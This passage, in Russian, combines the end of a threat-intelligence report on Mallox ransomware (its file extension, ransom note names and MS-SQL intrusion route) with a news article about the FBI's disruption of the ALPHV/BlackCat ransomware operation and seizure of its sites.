Зашифрованные файлы добавляются с расширением .mallox, а в каждую папку, содержащую заблокированные файлы, записывается записка о выкупе с именем файла «HOW TO BACK FILES.TXT». Записка о выкупе содержит инструкции о том, как получить инструмент расшифровки с помощью TOR, а также TargetID — уникальный идентификатор жертвы. Начиная с середины 2023 года мы заметили, что контактный адрес электронной почты в примечаниях о выкупе Mallox изменился с «mallox@onionmail» на «[email protected]».
В дополнение к запискам о выкупе на рабочий стол пользователя записывается файл «Targetinfo.txt». Этот файл также содержит TargetID, а также основные сведения о среде хоста (версия ОС, архитектура, имя хоста и т. д.).
Заключение
Несмотря на предыдущие неудачи, такие как выпуск общедоступного расшифровщика для более ранних версий своих полезных данных, Mallox поддерживает постоянный поток компрометаций и повторяет успешные версии своей программы-вымогателя. Продолжающееся злоупотребление непропатченными интерфейсами MS-SQL и подбор слабых паролей позволяет предположить, что группа не видит необходимости менять свою тактику, в то время как организации оставляют такой плодотворный путь открытым для злоумышленников.
https://www.sentinelone.com/blog/mallox-resurrected-ransomware-attacks-exploiting-ms-sql-continue-to-burden-enterprises/
ФБР успешно взломало серверы программы-вымогателя ALPHV, чтобы отслеживать их деятельность и получать ключи дешифрования.
7 декабря BleepingComputer впервые сообщил, что веб-сайты ALPHV, также известные как BlackCat, внезапно перестали работать, в том числе сайты переговоров Tor и сайты утечки данных банды вымогателей.
Хотя администратор ALPHV утверждал, что это проблема с хостингом, BleepingComputer узнал, что это связано с операцией правоохранительных органов.
Сегодня Министерство юстиции подтвердило нашу информацию, заявив, что ФБР провело правоохранительную операцию, которая позволила им получить доступ к инфраструктуре ALPHV.
Благодаря этому доступу ФБР в течение нескольких месяцев молча следило за работой программы-вымогателя, перекачивая ключи дешифрования. Эти ключи расшифровки позволили ФБР бесплатно помочь 500 жертвам восстановить их файлы, сэкономив примерно 68 миллионов долларов на требованиях выкупа.
Кроме того, ФБР конфисковало домен сайта утечки данных ALPHV, на котором теперь отображается баннер, сообщающий, что он был конфискован в ходе международной операции правоохранительных органов.
ФБР заявляет, что они захватили веб-сайт после получения пар открытого и закрытого ключей для скрытых сервисов Tor, под управлением которых работал веб-сайт, что позволило им получить контроль над URL-адресами.
«В ходе этого расследования правоохранительные органы получили доступ к сети Blackcat Ransomware Group», — говорится в распечатанном ордере на обыск.
«В результате ФБР выявило и собрало 946 пар открытых/закрытых ключей для сайтов Tor, которые группа Blackcat Ransomware Group использовала для размещения сайтов общения с жертвами, сайтов утечек и партнерских панелей, подобных описанным выше».
«ФБР сохранило эти пары открытого и закрытого ключей на флэш-накопителе».
В сообщении о задержании говорится, что правоохранительная операция проводилась полицией и следственными органами США, Европола, Дании, Германии, Великобритании, Нидерландов, Германии, Австралии, Испании и Австрии.
«Федеральное бюро расследований конфисковало этот сайт в рамках скоординированных действий правоохранительных органов, предпринятых против программы-вымогателя ALPHV BlackCat», — говорится в сообщении об аресте.
«Эти действия были предприняты в координации с прокуратурой США по южному округу Флориды и отделом компьютерных преступлений и интеллектуальной собственности Министерства юстиции при существенном содействии Европола и Zentrale Kriminalinspektion Guttingen».
С момента сбоя в работе серверов ALPHV филиалы теряли доверие к этой операции: BleepingComputer узнал, что они связывались с жертвами напрямую по электронной почте, а не через сайт переговоров Tor.
Вероятно, это произошло из-за того, что злоумышленники полагали, что инфраструктура ALPHV была скомпрометирована правоохранительными органами, что подвергло их риску, если они ее воспользуются.
Компания-вымогатель LockBit также восприняла этот сбой как ранний праздничный подарок, сообщив своим филиалам, что они могут перейти в его подразделение, чтобы продолжить переговоры с жертвами.
Эта операция на протяжении многих лет осуществлялась под разными названиями и каждый раз подвергалась взлому со стороны правоохранительных органов.
Первоначально они были запущены как DarkSide в августе 2020 года, а затем закрылись в мае 2021 года, столкнувшись с сильным давлением со стороны правоохранительных органов, вызванным широко разрекламированной атакой банды на Colonial Pipeline.
Позднее операция по вымогательству вернулась под названием BlackMatter 31 июля, но снова была прекращена в ноябре 2021 года после того, как Emsisoft воспользовалась уязвимостью для создания дешифратора и серверы были захвачены.
Группа снова вернулась в ноябре 2021 года, на этот раз под названием BlackCat/ALPHV. С тех пор BlackCat постоянно совершенствует свою тактику вымогательства и использует необычный подход, заключаясь в партнерстве с англоязычными филиалами.
Как мы видели в прошлом, в результате этой операции неудивительно, что в ближайшем будущем группа снова проведет ребрендинг под другим именем.
https://www.bleepingcomputer.com/news/security/fbi-disrupts-blackcat-ransomware-operation-creates-decryption-tool/